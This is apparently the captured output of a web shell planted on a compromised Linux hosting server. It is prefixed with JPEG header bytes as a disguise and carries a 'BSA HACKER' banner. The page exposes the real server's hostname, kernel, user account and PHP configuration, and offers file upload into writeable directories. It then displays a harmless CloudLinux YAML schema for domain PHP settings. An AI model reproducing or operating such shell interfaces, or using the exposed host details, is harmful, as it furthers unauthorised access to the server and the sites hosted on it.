ÿØÿàJFIFHHÿá .
BSA HACKER
Logo of a company Server : Apache
System : Linux nusantara.hosteko.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : koperas1 ( 1254)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/vendors_api/schemas/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/cloudlinux/venv/lib64/python3.11/site-packages/vendors_api/schemas/domains_with_php.yaml
---
type: object
patternProperties:
  "^.+$":
    type: object
    properties:
      owner:
        type: string
      document_root:
        type: string
      is_main:
        type: boolean
      php:
        type: object
        properties:
          php_version_id:
            type:
              - string
              - "null"
          version:
            type: string
          ini_path:
            type: string
          is_native:
            type: boolean
          fpm:
            type: string
          handler:
            type:
              - string
              - "null"
        required:
          - version
          - ini_path
    required:
      - owner
      - php
    additionalProperties: false